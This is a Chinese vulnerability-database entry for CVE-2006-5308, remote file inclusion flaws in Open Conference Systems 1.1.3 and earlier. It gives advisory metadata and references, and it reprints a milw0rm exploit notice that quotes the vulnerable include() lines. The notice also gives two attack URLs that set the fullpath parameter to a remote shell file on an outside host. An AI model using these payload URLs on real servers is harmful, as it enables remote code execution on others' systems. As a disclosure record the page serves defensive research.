Open Conference Systsems 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111282 漏洞类型 输入验证
发布时间 2006-10-13 更新时间 2006-10-18
CVE编号 CVE-2006-5308 CNNVD-ID CNNVD-200610-255
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2536
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-255
|漏洞详情
OpenConferenceSystems(OCS)中存在多个PHP远程文件包含漏洞,远程攻击者可以通过(1)include/theme.inc.php或(2)include/footer.inc.php的fullpath参数中的URL执行任意PHP代码。
|漏洞EXP
#########################################################################
# Open Conference Systems <= 1.1.3 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org
########################################################################
file ;
  theme.inc.php
  footer.inc.php
########################################################################
bugs ;
at -- theme.inc.php
 include($fullpath."themes/$theme/theme.inc.php");
at -- footer.inc.php
 include_once($fullpath."include/theme.inc.php");
########################################################################
exmple and methode exploit ;
 http://localhost/ocs/include/theme.inc.php?fullpath=http://shell/cmd.gif?
 http://localhost/ocs/include/footer.inc.php?fullpath=http://shell/cmd.gif?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubicrew (all member solpotcrew community)
#asiahacker
person;
y3dips,lirva32,the_day,K-159(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-13]
|参考资料

来源:BID
名称:20567
链接:http://www.securityfocus.com/bid/20567
来源:VUPEN
名称:ADV-2006-4041
链接:http://www.frsirt.com/english/advisories/2006/4041
来源:SECTRACK
名称:1017071
链接:http://securitytracker.com/id?1017071
来源:SECUNIA
名称:22412
链接:http://secunia.com/advisories/22412
来源:XF
名称:ocs-fullpath-file-include(29517)
链接:http://xforce.iss.net/xforce/xfdb/29517
来源:MILW0RM
名称:2536
链接:http://www.milw0rm.com/exploits/2536
来源:pkp.sfu.ca:8043
链接:http://pkp.sfu.ca:8043/bugzilla/show_bug.cgi?id=2436
来源:pkp.sfu.ca:8043
链接:http://pkp.sfu.ca:8043/bugzilla/attachment.cgi?id=90
来源:pkp.sfu.ca
链接:http://pkp.sfu.ca/ocs_download
来源:MISC
链接:http://isc.sans.org/diary.php?storyid=1791
来源:MILW0RM
名称:2536
链接:http://milw0rm.com/exploits/2536